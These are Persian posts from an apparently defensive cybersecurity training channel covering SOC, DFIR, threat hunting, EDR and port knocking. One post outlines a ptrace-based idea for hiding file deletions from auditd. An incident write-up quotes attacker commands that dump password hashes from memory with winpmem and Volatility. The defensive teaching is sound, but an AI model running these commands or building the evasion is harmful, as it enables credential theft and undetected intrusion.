3933
🍎آموزش و ترویج علمی فناوری اطلاعات ، امنیت و مدیریت پروژه های مرتبط 🍁 و کمی هم اخلاق و انسانیت Training of Information Technology, Cyber Security, Project Management, Ethics and Humanitarian ارتباط با مدیر کانال: @roozbehadm
بلوغ شناسایی تهدید با کمک AI در XDR
استفاده طولانیمدت از پلتفرمهایی مانند Trend Micro Vision One که با آنها کار کرده ام ، تنها به معنی داشتن ابزار بهتر نیست؛ بلکه فرصتی برای ساخت یک «ماشین شناسایی دقیق» فراهم میکند.
در ماههای ابتدایی، سیستم AI سعی میکند از میان دادههای لایههای مختلف (ایستگاه کاری، سرور، ایمیل، شبکه و غیره) الگو بسازد. این مرحله پر از نویز است، اما تدریجاً یک Baseline از رفتار عادی سازمان شکل میگیرد.
با گذشت زمان و بازخورد مداوم تیم SOC، مدلهای هوش مصنوعی نهتنها رفتارهای عمومی تهدیدات، بلکه نشانههای خاص حملهگر به سازمان شما را نیز یاد میگیرند. همزمان، همبستگی رویدادها (Event Correlation) عمیقتر میشود و دادههای بین لایهای تصویر کاملتری از زنجیره حمله ارائه میدهند.
نتیجه این بلوغ تدریجی؟
وجود True Positive بالاتر و کاهش آلارمهای اشتباه.
و MTTD کوتاهتر و واکنش سریعتر.
شناسایی تهدیدات پیچیدهای که در شروع کار از چشم پنهان میماندند.
این روند را میتوان در «منحنی بلوغ شناسایی» دید؛ جایی که از یادگیری اولیه تا شناسایی هوشمند، فاصلهای پر از داده، تجربه و تعامل انسان و AI پیموده میشود
#آکادمی_روزبه
موضوع تحقیق:
مدلهای زبانی در SOC لایه ۱
۵ مدل LLM (مثل GPT‑4o، LLaMA 3، Mixtral، و چند مدل دیگر) را تست کردهاند.
وظیفه: تشخیص اینکه هشدارهای امنیتی شبیهسازیشده «جالب» (یعنی نیازمند پیگیری) هستند یا «بیاهمیت».
محیط تست: SOC شبیهسازیشده با Wazuh و CALDERA.
نتایج کلیدی:
این LLMها میتوانند triage اولیه را سریعتر کنند و فشار فکری روی آنالیست را کاهش دهند.
با زبان طبیعی، توضیح میدهند چرا تصمیمی گرفتهاند — این برای تصمیمگیری کمک میکند.
هنوز چالشها وجود دارد:
مسأله Hallucination (پاسخ اشتباه ولی با اطمینان)،
پیچیدگی ادغام در سیستمهای موجود،
ریسک حریم خصوصی.
نتیجهگیری:
این مدلها جایگزین آنالیست انسانی نمیشوند.
ولی به عنوان دستیار (copilot) میتوانند کار SOC را سریعتر، کارآمدتر و مقاومتر کنند
#آکادمی_روزبه
ابزار، منتها را نشان نمیدهد؛ این «سؤالهای درست پرسیدن» است که تحلیلگر واقعی میسازد.
چرا بعضی متخصصان امنیت با وجود دانش فنی، در تحلیلهای امنیتی ضعف دارند؟
بر اساس مشاهداتم در دنیای SOC، DFIR و Threat Hunting، دلایل اصلی را میتوان اینطور دستهبندی کرد:
۱. نگاه ابزاری به جای نگاه تحلیلی
بعضیها یاد گرفتهاند که با SIEM، EDR یا ابزارهای DFIR کار کنند، اما تحلیل را مساوی با خروجی ابزار میدانند. در واقع، ابزار فقط «چراغقوه» است؛ مسیر و روایت را باید خود تحلیلگر بسازد.
۲. ضعف در مدلسازی ذهنی تهدید
بدون یک طرح ذهنی از مهاجم، تاکتیکها و زنجیره حمله (Kill Chain / ATT&CK)، دادهها مثل تکههای پازل بیمعنی به نظر میرسند. در نتیجه تحلیلها سطحی میمانند.
۳. انتظار دیدن نشانههای واضح
حملههای مدرن معمولاً در لایه «تقریباً عادی» حرکت میکنند — مثل اجرای یک باینری مایکروسافت اما با تغییر جزئی. کسانی که فقط به دنبال «علامت خطر قرمز» هستند، اقدامات مخفی را نمیبینند.
۴. کمبود تجربه بیندامنهای
تحلیل امنیتی فقط دانش سایبری نیست؛ باید کمی روانشناسی مهاجم، اقتصاد حملات (ROI)، و حتی الگوهای رفتاری کاربر را هم فهمید. این لایهی شناخت، مهارت شناسایی الگو را چند برابر میکند.
۵. نبود تمرین حل مسئلهٔ خام
مثل عضلات بدن، ذهن تحلیلی هم با تمرین قوی میشود — مثلاً تحلیل لاگ خام، بررسی PCAP بدون فیلتر، یا شبیهسازی سناریوهای مبهم. بسیاری به خاطر عدم تمرین، در مواجهه با دادههای بیساختار قفل میکنند.
با آمدن مثلا اسپلانک ES یا UBA و همچنین مخازن سیگما ؛ عملا ذهن یوزکیس نویسان رو به تنبلی میگذارد.
#آکادمی_روزبه
سناریوی حمله: ربودن syscall برای نامرئی شدن
یک ایده برای PoC
روزبه نوروزی
یک مهاجم حرفهای میداند که مدیران سیستم از ابزارهایی مانند auditd برای نظارت بر فعالیتها استفاده میکنند. auditd با نظارت بر فراخوانهای سیستمی (syscalls) کار میکند. بنابراین، یک راه هوشمندانه برای دور زدن auditd، دستکاری خود فراخوانهای سیستمی قبل از رسیدن به کرنل است. اینجاست که ptrace وارد بازی میشود.
هدف مهاجم: اجرای دستورات مخرب (مانند حذف یک فایل مهم) بدون اینکه auditd آن را ثبت کند.
مراحل حمله:
اجرای یک حامل (Carrier Process): مهاجم یک برنامه ساده را اجرا میکند. این برنامه قرار است به عنوان “ردیاب” عمل کند و فرآیند شل (مثلاً bash) را کنترل نماید.
کنترل شل با ptrace: برنامه حامل، فرآیند bash را با استفاده از ptrace(PTRACE_SYSCALL, ...) تحت کنترل خود در میآورد. این دستور به ردیاب اجازه میدهد تا درست قبل از اجرای یک فراخوان سیستمی و درست بعد از اتمام آن، اجرای فرآیند هدف (شل) را متوقف و آن را بازرسی کند.
رهگیری و تغییر فراخوان سیستمی:
مهاجم در شل کنترلشدهی خود، دستور rm /var/www/html/backup.zip را تایپ میکند.
شل bash تلاش میکند فراخوان سیستمی unlink یا unlinkat را برای حذف فایل فراخوانی کند.
قبل از اینکه این فراخوان به کرنل برسد، برنامه حامل (که با ptrace شل را کنترل میکند) اجرا را متوقف میکند.
برنامه حامل محتوای رجیسترها را بررسی میکند و میبیند که یک فراخوان unlinkat با آرگومان /var/www/html/backup.zip در حال اجرا است.
اینجا نقطه کلیدی است: برنامه حامل، شماره فراخوان سیستمی را در رجیستر مربوطه (مثلاً rax در x86-64) از شماره unlinkat به شماره یک فراخوان بیخطر مانند getpid تغییر میدهد!
سپس به فرآیند شل اجازه ادامه کار میدهد.
نتیجه چه میشود؟
از دید کرنل و auditd، فرآیند bash فقط فراخوان getpid را اجرا کرده است. بنابراین، auditd یک رویداد بیاهمیت را ثبت میکند (یا اصلاً ثبت نمیکند، بستگی به قوانین دارد).
اما در واقعیت، برنامه حامل که کنترل کامل روی حافظه bash دارد، مستقیماً و بدون استفاده از syscall، کد لازم برای حذف فایل را اجرا میکند یا از تکنیک دیگری برای پاک کردن آن بهره میبرد.
پایان قسمت اول
حالا این ایده بنده هست اگر نقدی براون وارد هست پذیرا هستم.
**این ایده در سیستم های هاردن شده و دارای EDR قابلیت اجرا ندارد.
#آکادمی_روزبه
درس آموخته از یک حادثه امنیتی خاموش: وقتی ابزارهای قانونی به سلاح تبدیل میشوند
روزبه نوروزی
مقدمه: نگاهی به یک سناریوی نگرانکننده
حدود شش ماه پیش، زمانی که در سازمان ..... مشغول به کار بودم، با یک سناریوی امنیتی مواجه شدیم که درک ما را از ماهیت تهدیدات داخلی و خارجی عمیقاً تغییر داد. این تجربه، که حول محور سوءاستفاده از ابزارهای معتبر و قانونی در حوزه فارنزیک دیجیتال میچرخید، به یک درس آموخته حیاتی برای تیم ما تبدیل شد. این مقاله به بازبینی آن حادثه و نتایج کلیدی آن میپردازد تا اهمیت نظارت پیشگیرانه و استراتژیهای دفاعی مدرن را روشن سازد.
شرح واقعه: شناسایی یک فعالیت غیرعادی
همه چیز از یک هشدار در سیستم نظارت بر لاگها (SIEM) شروع شد. هشداری که در ابتدا ممکن بود به سادگی نادیده گرفته شود، اجرای چند دستور خاص در خط فرمان یکی از سرورهای کلیدی ما را نشان میداد:
# دستورات مشاهده شده در لاگها
winpmem_mini_x64_rc2.exe mem.raw
vol.exe -f .\mem.raw windows.cachedump.Cachedump
vol.exe -f .\mem.raw windows.Hashdump.Hashdump
برای یک فرد ناآشنا، این دستورات ممکن است بیخطر به نظر برسند. Winpmem و Volatility ابزارهای استاندارد و مورد احترام در جعبهابزار هر متخصص پاسخ به رخداد و فارنزیک دیجیتال (DFIR) هستند. اما سوال کلیدی که ما از خود پرسیدیم این بود: "آیا در حال حاضر تیم امنیت در حال انجام تحلیل فارنزیک روی این سرور است؟"
پاسخ سریع و نگرانکننده بود: "خیر."
هیچکدام از اعضای تیم امنیت یا مدیران سیستم مجوزی برای چنین عملیاتی صادر نکرده بودند. این لحظهای بود که فهمیدیم با یک تهدید جدی روبرو هستیم. یک عامل ناشناس (خواه یک مهاجم خارجی که به سیستم دسترسی پیدا کرده بود یا یک عامل داخلی مخرب) در حال استفاده از ابزارهای ما علیه خودمان بود.
تحلیل فنی تهدید: سرقت اعتبارنامه با ابزارهای قانونی (Living Off The Land)
تحقیقات ما نشان داد که مهاجم یک سناریوی کلاسیک سرقت اعتبارنامه (Credential Theft) را با استفاده از تکنیک "Living Off The Land" (LotL) پیادهسازی کرده بود. این رویکرد به مهاجمان اجازه میدهد تا با استفاده از ابزارهای قانونی و موجود در سیستم، از دید سیستمهای امنیتی سنتی مانند آنتیویروسها پنهان بمانند.
1. winpmem ... mem.raw: در گام اول، مهاجم با استفاده ازWinpmem، یک کپی کامل از حافظه RAM سرور تهیه کرده بود. حافظه RAM گنجینهای از اطلاعات حساس شامل کلیدهای رمزنگاری، دادههای پردازششده و از همه مهمتر، اعتبارنامههای کاربری (Username/Password Hashes) است.
2. vol.exe ... cachedump: سپس، با استفاده از فریمورک قدرتمند Volatility، مهاجم پلاگین cachedump را روی فایل حافظه اجرا کرده بود تا هشِ پسوردهای کاربرانی که اخیراً به سیستم لاگین کرده بودند را استخراج کند.
3. vol.exe ... Hashdump: برای تکمیل کار، مهاجم با پلاگین Hashdump، هش پسوردهای تمام کاربران محلی را از پایگاه داده SAM که در حافظه بارگذاری شده بود، استخراج کرد.
هدف نهایی کاملاً مشخص بود: به دست آوردن هشهای پسورد برای اجرای حملات Pass-the-Hash و حرکت جانبی (Lateral Movement) در شبکه، یا کرک کردن آنها به صورت آفلاین برای دستیابی به پسوردهای واقعی.
درسهای آموخته کلیدی
این حادثه، که خوشبختانه به دلیل شناسایی به موقع مهار شد، سه درس حیاتی برای ما به همراه داشت:
۱. نظارت بر خط فرمان، یک ضرورت است نه یک گزینه:
بسیاری از سازمانها تنها فایلهای اجرایی یا ترافیک شبکه را نظارت میکنند. این حادثه به ما آموخت که نظارت دقیق بر دستورات اجرا شده در Command Prompt، PowerShell و سایر Shell-ها یک لایه دفاعی حیاتی است. ابزارهایEDR (Endpoint Detection and Response) در این زمینه نقش کلیدی ایفا میکنند. ما بلافاصله قوانینی برای ایجاد هشدار فوری (Alert) هنگام اجرای ابزارهایی مانندWinpmem,Volatility
,Mimikatz و موارد مشابه، خارج از چارچوب یک تیکت پشتیبانی رسمی، تنظیم کردیم.
۲. آنتیویروس به تنهایی کافی نیست:
خطر اصلی این حمله در "قانونی" بودن ابزارهای مورد استفاده نهفته بود. هیچ آنتیویروسیWinpmem یا Volatility را به عنوان بدافزار شناسایی نمیکند، زیرا آنها ابزارهای قانونی هستند. این تجربه، محدودیتهای رویکردهای مبتنی بر امضا (Signature-based) را به وضوح نشان داد و ما را به سمت راهکارهای دفاعی پیشرفتهتر سوق داد.
۳. قدرت انکارناپذیر لیست سفید برنامهها (Application Allowlisting):
پایان قسمت اول
مقوله Single Packet Authorization (SPA) چیست؟
بحث Port Knocking در فوق که مورد توجه دوستان قرار گرفت گفتم در ادامه اش ؛ این مطلب زیر رو هم بگذارم
مقوله Single Packet Authorization یا احراز هویت با بسته منفرد؛ یک تکنیک امنیتی پیشرفته برای مخفیکردن سرویسها و کنترل دسترسی به آنهاست.
در این روش، درست مثل Port Knocking، همه پورتهای حساس (مثل SSH روی پورت 22) بهطور پیشفرض بستهاند. اما فرق اصلی اینجاست: به جای اینکه کاربر چند “تقتق” بزند و یک دنباله بسازد، همه چیز در یکبار و فقط با یک بسته رمزنگاریشده انجام میشود.
داستان چطور است؟
فرض کنید خانهای دارید با یک در نامرئی. فقط با گفتن یک کلمهعبور رمزنگاریشده، که آن را در یک یادداشت قفلشده داخل پاکت به نگهبان در میدهید، در برای شما باز میشود و برای بقیه همچنان نامرئی باقی میماند.
در شبکه هم همین اتفاق میافتد:
وضعیت اولیه (همه چیز بسته): فایروال سرور هیچ پاسخی به هیچ اتصال روی پورت حساس نمیدهد (Stealth Mode کامل).
ارسال بسته جادویی: کاربر مجاز ؛ با استفاده از ابزاری مثل fwknop یا یک کلاینت اختصاصی، یک بسته UDP یا TCP حاوی اطلاعات احراز هویت را رمزنگاری و امضا شده به سرور میفرستد.
تشخیص روی سرور: سرویس SPA روی سرور (مثلاً fwknopd) بسته را باز میکند، امضا را بررسی میکند و در صورتی که معتبر بود، پورت مورد نظر را فقط برای همان IP باز میکند.
اعتبار موقت: این باز شدن فقط برای مدت کوتاهی فعال است و سپس به حالت “کاملاً نامرئی” برمیگردد.
چرا این روش بهتر از Port Knocking است؟
یک شلیک، یک ضربه: به جای چند پورت و دنباله پیچیده، همه چیز در یک بسته انجام میشود.
رمزنگاری: حتی اگر مهاجم ترافیک را شنود کند، الگو و محتوای Knock را نمیبیند.
امنیت در برابر Replay Attack: چون دارای زمانبندی و شمارهیکتای احراز است، بازپخش آن بیفایده میماند.
سازگاری با NAT و IPv6: برخلاف Port Knocking سنتی، اینجا مشکل آدرسهای پویای پشت NAT کمتر است.
به زبان ساده، SPA مناسب برای محیطهایی که هم امنیت بالا میخواهند و هم سرویسها باید کاملاً مخفی بمانند
#آکادمی_روزبه
بحث Port Knocking چیست؟
مقوله Port Knocking (به فارسی: در زدن به پورت) یک تکنیک امنیتی برای کنترل دسترسی به سرویسهای شبکه است. در این روش، پورتهای یک سرویس (مانند SSH روی پورت 22) به طور پیشفرض روی فایروال کاملاً بسته و غیرقابل دسترس هستند. برای باز شدن یک پورت خاص، کاربر باید یک “رمز عبور مخفی” را ارسال کند. این رمز عبور، یک دنباله از پیش تعریفشده از تلاش برای اتصال به پورتهای مختلف است.
به زبان ساده، شما به جای اینکه مستقیماً به در اصلی (مثلاً پورت 22) بروید و آن را باز کنید (که همیشه بسته است)، ابتدا یک سری “تق تق” خاص به درهای دیگر میزنید (مثلاً یک بار به پورت 1000، سپس دو بار به پورت 2000 و در آخر یک بار به پورت 3000). اگر این الگوی “در زدن” صحیح باشد، فایروال به طور موقت در اصلی (پورت 22) را فقط برای شما (آدرس IP شما) باز میکند.
این کار باعث میشود که سرویسهای شما از دید اسکنرهای پورت (Port Scanners) و مهاجمان کاملاً نامرئی باشند، زیرا هیچ پورت بازی برای شناسایی وجود ندارد.
مبحث Port Knocking چگونه کار میکند؟
این فرآیند معمولاً توسط یک سرویس کوچک (Daemon) روی سرور مدیریت میشود (مانند knockd در لینوکس) که لاگهای فایروال را برای پیدا کردن الگوی صحیح زیر نظر دارد.
وضعیت اولیه (State 0 - همه چیز بسته):
فایروال سرور طوری تنظیم شده است که تمام ترافیک ورودی به پورتهای حساس (مثلاً پورت 22 برای SSH) را مسدود (DROP یا REJECT) کند.
در این حالت، اگر کسی تلاش کند پورت 22 را اسکن کند، هیچ پاسخی دریافت نمیکند و تصور میکند این پورت بسته است.
ارسال دنباله “در زدن” (The Knock Sequence):
کاربر مجاز (Client) که قصد اتصال به سرویس SSH را دارد، از یک ابزار ساده (مانند netcat, nmap یا یک اسکریپت اختصاصی) استفاده میکند تا بستههای TCP یا UDP را به ترتیب به پورتهای از پیش توافق شده ارسال کند.
مثال دنباله:
یک بسته TCP SYN به پورت 7000
یک بسته TCP SYN به پورت 8000
یک بسته TCP SYN به پورت 9000
مهم نیست که این پورتها واقعاً باز باشند یا نه. خودِ “تلاش برای اتصال” به عنوان یک سیگنال عمل میکند.
تشخیص الگو توسط سرور (Server-side Detection):
سرویس knockd روی سرور به طور مداوم لاگهای فایروال (iptables, nftables) را مشاهده میکند.
وقتی بستهای به یک پورت بسته میرسد، فایروال آن را لاگ میکند. سرویس knockd این لاگها را میخواند و به دنبال دنباله صحیح از آدرس IP مشخصی میگردد (مثلاً: تلاش برای اتصال به پورت 7000، سپس 8000، سپس 9000 از IP Address 1.2.3.4).
باز کردن موقت پورت (Opening the Port):
اگر knockd الگوی صحیح را از یک IP مشخص تشخیص دهد، یک دستور به فایروال ارسال میکند تا پورت اصلی (مثلاً 22) را فقط برای آن IP خاص باز کند
#آکادمی_روزبه
شکار تهدید: کشف سوءاستفاده از werfault.exe
عزیزان بسیاری در SOC های کشور درحال انجام وظایف خطیر هستند که بعضا منجر به کشف های بدیع و جالب میگردد.
اما نکته مهم آن است که اشتراک تجربیات به میزان کمی صورت میپذیرد. دلیل آن را نمیخواهم بشکافم ولی ترجیح میدهم هم به همکاران هم به مدیران آنها توصیه به اشتراک دانش داشته باشم.
خودم درحد توان که باشه ، تجربیاتی که مشکل امنیتی نداشته داشته باشه رو برای انتقال تجربیات اینجا میگذارم .
در یکی از پروژههای شکار تهدید اخیر، متوجه یک الگوی غیرعادی در لاگهای EDR شدم. یک پروسس سیستم مایکروسافت بهنام werfault.exe --که در حالت عادی مسئول گزارش خطاها و ارسال آن به مایکروسافت است -- در حال برقراری ارتباط شبکهای با یک دامنه ناشناس بود.
در نگاه اول، این رفتار میتوانست یک خطای سیستمی عادی تلقی شود، اما بررسی دقیقتر مسیر اجرای پروسس نشان داد که فایل werfault.exe از مسیر پیشفرض ویندوز (C:\Windows\System32\) اجرا نشده، بلکه در یک مسیر مشکوک مانند C:\ProgramData\ قرار داشته است. این موضوع احتمال جعل یا سوءاستفاده عمدی را بهشدت تقویت کرد.
با بازسازی زنجیره رویداد (Event Chain) مشخص شد که مهاجم از تکنیک DLL Sideloading بهره برده و werfault.exe را بهعنوان یک LOLBAS برای اجرای لودر بدافزار استفاده کرده است. به دلیل اعتماد ذاتی بسیاری از راهکارهای امنیتی به این پروسس، فعالیتهای مخرب آن از دید مکانیزمهای پیشگیری عبور کرده بود.
در گام پایانی، با قرنطینه کردن فایل جعلی و مسدود کردن ارتباطات شبکهای مرتبط، مسیر نفوذ مهاجم مسدود شد و IoCهای بهدستآمده به تیمهای Blue و Red جهت بهبود Playbookها و سناریوهای شبیهسازی ارسال گردید.
این تجربه بار دیگر ثابت کرد که در شکار تهدید، حتی «پروسسهای آشنا» نیز میتوانند میزبان فعالیتهای بسیار مخرب باشند و تحلیل مبتنی بر ناهنجاری رفتاری یکی از کلیدهای اصلی موفقیت است.
#آکادمی_روزبه
هاب انتقال تجربیات عملیاتی
اینو به یکی گفتن که EDR بای پس کرده
تبریک بابت اینکه یکبار با تکنیک تازهات تونستی از EDR عبور کنی. اما واقعیت اینه که سیستم رو دور نزدی؛ فقط باعث شدی پروفایل (شناخت) سیستم ازت بالاتر بره.
حالا فعالیتهات مثل انگشت زخمی وسط بقیه دستها معلومه. دادههای تلهمتری داره جمع میشه، ارتباطها و الگوها در حال شکلگیریه، و هر حرکت بعدی فقط پروندهت رو قویتر میکنه. EDR کور نیست، فقط تو پرچمها (هشدارها) رو نمیبینی
مخفیگاه نامرئی در کرنل: چرا Keyring برای شکارچیها مهم است؟
در هسته لینوکس، زیرسیستمی بهنام Key Retention Service یا همان keyrings وجود دارد که هدف اصلی آن ذخیره امن کلیدها و دادههای حساس در حافظه کرنل است. این ساختار، برخلاف فایلهای معمولی، هرگز روی دیسک نوشته نمیشود و همین ویژگی آن را به عرصهای جذاب برای مخفیکاری مهاجمان تبدیل میکند.
یک تهدیدگر میتواند Payload یا تنظیمات backdoor خود را بهصورت رشتههای رمزگذاریشده در keyring قرار دهد. این دادهها از دید ابزارهای مانیتورینگ فایلسیستم کاملاً شفاف هستند؛ حتی اگر از Snapshot یا Image کامل سیستم استفاده شود، اثری از آنها در دیسک یافت نمیشود. به بیان ساده، SOC شما ممکن است تمام هارد را بررسی کند و همچنان سرنخ اصلی را نبیند.
خطر بیشتر زمانی نمایان میشود که بدانیم این دادهها با راهاندازی مجدد سیستم بهطور کامل حذف شده و در هیچیک از لاگهای معمول /var/log ثبت نمیگردند. بنابراین، تنها روش کشف آنها، انجام Live Memory Hunting یا تحلیل فایل Crash Dump است.
برای یک تحلیلگر یا شکارچی تهدید، تسلط بر شناسایی و ترکیب این شواهد در حافظه زنده، میتواند مرز بین یک نفوذ کشفشده و یک نفوذ کاملاً نامرئی را تعیین کند.
#آکادمی_روزبه
مرکز تخصصی CISSP
۳. مزایای کلیدی چرخه بازخورد آنی
حداکثر کردن ارزش هر تست (Maximize ROI): به جای صرف هزینه برای یک گزارش حجیم که شاید هرگز کامل اجرا نشود، هر تست مستقیماً به یک بهبود دفاعی قابل اندازهگیری منجر میشود.
یادگیری متقابل (Collaborative Learning):
تیم آبی یاد میگیرد که مهاجمان چگونه فکر و عمل میکنند. آنها به جای دیدن یک هشدار خشک، “روح” حمله را درک میکنند.
تیم قرمز یاد میگیرد که دفاعها چگونه کار میکنند. این به آنها کمک میکند تا در آینده تکنیکهای پیشرفتهتر و پنهانکارانهتری برای دور زدن دفاعها طراحی کنند.
کاهش نقاط کور امنیتی (Reduce Blind Spots): با تست سیستماتیک تکنیکها (مثلاً بر اساس چارچوب MITRE ATT&CK)، سازمان به درک دقیقی از پوشش امنیتی خود میرسد. “ما در برابر ۷۰٪ تکنیکهای گروه APT29 قابلیت تشخیص داریم.”
افزایش روحیه و همکاری (Improved Morale): این رویکرد، تقابل خصمانه بین تیمها را به یک همکاری سازنده برای یک هدف مشترک (امنیت سازمان) تبدیل میکند. این امر باعث افزایش انگیزه و کاهش فرسودگی شغلی میشود.
اعتبارسنجی ابزارهای امنیتی (Security Control Validation): سازمانها میلیونها تومن صرف خرید ابزارهای امنیتی میکنند. تیم بنفش و چرخه بازخورد آنی به طور عملی نشان میدهد که آیا این ابزارها واقعاً آنطور که در بروشور تبلیغاتیشان ادعا شده، کار میکنند یا خیر
بخشی از درس تیم بنفش
ثبت نام دوره عمومی ( غیر سازمانی) سنز ۵۹۹ از پایان مهر
به زبان خودمانی
امروز یک مصاحبه داشتم که انتخاب نیرو در لایه شبکه بود . خواستم از مطالبم استفاده کند لذا اینجا و کانال تلگرام رو معرفی کردم.
بعدش در حین معرفی دیدم چقدر مطالبم سخت شده و لازمه کلی مقدمات بدونن برای درک اونها .
انشالله بتونیم براش شرایطی فراهم کنیم تا از فاند ویژه شرکت هامون استفاده کنه و در کلاس سطح 1 امنیت حضور داشته باشه تا بتونیم هم گفتمان بشیم .
ولی خودمم تصمیم گرفتم همون هشتک #امنیت_به_زبان_ساده رو ادامه بدم تا دوستان بتونن همگام باشند و خیلی فاصله ایجاد نشه
=======
پس EDRچست؟
این ابزار یا Endpoint Detection and Response رو اگر بخواهیم ساده و بیدردسر توضیح بدهیم، شبیه یک نگهبان همیشههوشیار برای سیستمهای شماست.
به زبان خیلی ساده:
گوش میدهد>> EDR همهی فعالیتهای سیستم (فایلها، پروسهها، شبکه، حافظه) را مثل یک دوربین امنیتی ضبط میکند.
تحلیل میکند >> دادههای جمعشده را با الگوهای بدافزار، رفتار مشکوک یا قوانین امنیتی مقایسه میکند. اگر چیزی غیرعادی باشد، میفهمد.
هشدار میدهد >>وقتی تهدیدی پیدا شد، به تیم امنیت پیام میدهد یا گزارش تهیه میکند.
واکنش نشان میدهد >> میتواند پروسهی آلوده را بکشد، فایل را قرنطینه کند یا ارتباط را قطع کند تا حمله جلو نرود.
تحقیقات بعدی >> همه شواهد را نگه میدارد تا تیم امنیت بفهمد چه اتفاقی افتاده و از تکرار حمله جلوگیری کند.
پس عملاً EDR یک ترکیب از دوربین مدار بسته + دزدگیر + افسر واکنش سریع برای هر ایستگاه کاری یا سرور است.
دوره سطح 1 از سه شنبه همین هفته
واتس اپ و بله 09902857290
#امنیت_به_زبان_ساده
جدول MITRE ATT&CK یک پایگاه دانش جهانی است که تاکتیکها و تکنیکهای حملات سایبری که تاکنون به سطح زمین آمده اند ( از دارک وب ) را دستهبندی میکند.
ایدهاش ساده است: مثل یک جدول تناوبی عناصر، ولی برای هکرها!
ستونها: تاکتیکها (Tactics) یعنی هدف مرحلهای مهاجم — مثل دسترسی اولیه، اجرای کد، جمعآوری اطلاعات، یا خروج داده.
ردیفها: تکنیکها (Techniques) که روش عملی انجام هر تاکتیک را نشان میدهند؛ مثلا برای اجرای کد میتواند از PowerShell، نفوذ در کرنل یا بدافزار استفاده شود.
هر تکنیک گاهی زیرتکنیک دارد با جزئیات دقیقتر.
در کنار آنها، اطلاعاتی مثل نمونههای واقعی، ابزارهای معروف، و روشهای شناسایی/دفاع هم ارائه میشود.
کاربردش برای SOC و تیم امنیت این است که بتوانند:
نقشه تهدید بسازند.
حملات شبیهسازی کنند.
شکافهای دفاعی را پیدا و پر کنند.
عملاً تبدیل به زبان مشترک میان تحلیلگر، تیم قرمز و مدیر امنیت میشود.
🟣و اما نکته ای برای افراد کهنه کار :
حرکت هکر لازم نیست کاملا برای اساس جدول مایتره باشد .
فرض کنید در پالایشگاه تیم SOC یک سناریوی حمله بر اساس MITRE ATT&CK ترسیم کرده:
ستونها را به شکل مرتب میچینند:
Initial Access >> ایمیل Phishing به حساب کاربری پیمانکار.
Execution >> اجرای ماکرو مخرب روی لپتاپ پیمانکار در شبکه IT.
Lateral Movement >> دسترسی به سرور OT Gateway.
Impact >> تغییر تنظیمات کنترل فشار.
اما مهاجم واقعی ممکن است پس از مرحله Lateral Movement دوباره برگردد به Discovery، برای شناسایی سیستمهای کنترلی حساس، یا حتی به Credential Access برای سرقت دسترسی ادمین PLC.
اگر SOC فقط خطی نگاه کند (“گام بعدی حتماً Impact است”)، این برگشت مهاجم را نمیبیند.
نتیجه چیست؟
مهاجم میتواند چند روز در شبکه بماند، مسیرهای جانبی برود و چندین نقطه حساس را بدون آشکار شدن کنترل کند.
برای پالایشگاه، یعنی باید برای هر تکنیک پوشش نظارتی مستقل گذاشت، حتی اگر فکر میکنیم “از آن مرحله گذشتهایم.”
🔆امیدوارم برایتان جالب بوده باشد
🔰سه شنبه سطح ۱ رو شروع میکنم و پنج شنبه CISSP
واتس اپ برای ملحق شدن به من و سایر دانشجویان 09902857290 گپی خودمانی به سادهترین روش و زبان برای بیان مسائل پیچیده دنیای امنیت
آنجا که نمیتوان به EDR اعتماد کرد
بیایید با محدودیت های EDR آشنا شویم
همه EDRها (چه CrowdStrike چه Defender ATP یا SentinelOne چه محصولات ایرانی) ذاتاً نیاز دارند OS حداقل تا کرنل بیاد بالا تا بتونند Agent/Driver خودشون رو لود کنند.
مکانیزمهای مقابله در Pre-OS خودشون EDR نیستند، بلکه:
✳️ مساله Secure Boot + Measured Boot + ELAM
✳️ ترکیب با Remote Attestation via TPM (ارسال PCR Values به Server امن)
✳️ و Off-Host Scanning (مثل استفاده از یک محیط Boot امن برای بررسی EFI و دیسک)
اگر این مکانیزمها فعال/بهروز نباشن، EDR بهتنهایی نمیتونه جلوی Bootkit رو بگیره.
حالا میتونید درک کنید وقتی مدیر امنیت یک سازمان هستی که برنامه به روزرسانی نداره چقدر در مردابی.
یا اگر در سازمان خاص مدیر هستی دیگه چقدر وضع خرابه ...
و تمپلیت های جالب
#آکادمی_روزبه
https://github.com/chocolatecoat/DFIR-Templates
دیده شده که کلی پکیج آلوده هستند. من با THOR اسکن کردم فعلا چیزی پیدا نکردم ولی بهوش باشید
لینک خبر
https://lnkd.in/dJSmhCxt
کیا مواظب باشند ؟
توسعهدهندگان یا تیمهایی که از Node.js و npm برای ساخت سایت، سرویس یا ابزار استفاده میکنند.
کسانی که CI/CD (خط خودکار build و deploy) دارند و بهصورت خودکار آخرین نسخه پکیجها را میگیرند، چون آلودگی خیلی سریع وارد فرآیند عملیاتی میشود.
حتی اگر مستقیم از این پکیجها استفاده نکنید، ممکن است بهصورت غیرمستقیم (dependency) داخل پکیجهای دیگر باشند.
#آکادمی_روزبه
📝 تجربه من با USN Journal در فارنزیک دیجیتال
در یکی از پروژههای تحلیل حادثه، به نقطهای رسیدیم که لاگهای سنتی سیستم تقریباً پاک یا دستکاری شده بودند. برای یافتن رد مهاجم، سراغ USN Journal رفتیم؛ ژورنال سیستم NTFS که همه تغییرات فایلها را حتی پس از حذف آنها؛ثبت میکند.
این کشف برایم شبیه ورق زدن دفترچه مخفی سیستم بود: هر ورودی، یک سرنخ از زمانی که فایلی ایجاد، ویرایش یا حذف شده است. با استفاده از ابزارهای متنباز مانند MFTECmd، توانستیم خط زمانی دقیقی از فعالیت مهاجم بسازیم؛ حتی لحظه نصب ابزارهای مخرب و پاکسازی آثار را بازیابی کردیم.
مهمترین درس:
در فارنزیک، همیشه یک لایه عمیقتر وجود دارد. مهاجم ممکن است لاگهای رویداد را پاک کند، اما زیرساختهایی مثل USN Journal را فراموش کند. از آن زمان، بررسی USN جزو چکلیست استاندارد من در تحلیل دیسک شد.
در دنیای امنیت، همانطور که در اقتصاد یا روانشناسی هم میبینیم، ردپاها معمولاً در جایی ماندگار میشوند که کمتر به چشم میآیند.
#آکادمی_روزبه
قسمت دوم
مهمترین درس آموخته، درک ارزش استراتژی Application Allowlisting بود. به جای تلاش برای شناسایی و مسدود کردن بینهایت ابزار مخرب (Blacklisting)، ما باید به یک مدل "اعتماد صفر" (Zero Trust) روی بیاوریم. در این مدل، به طور پیشفرض اجرای تمام برنامهها مسدود است، مگر آنکه صراحتاً در لیست برنامههای مجاز و ضروری کسبوکار قرار گرفته باشند. اگر چنین سیاستی در آن زمان پیادهسازی شده بود، مهاجم هرگز قادر به اجرای winpmem.exe یا vol.exe نبود و حمله در نطفه خفه میشد.
نتیجهگیری: از واکنشگرایی به پیشگیری
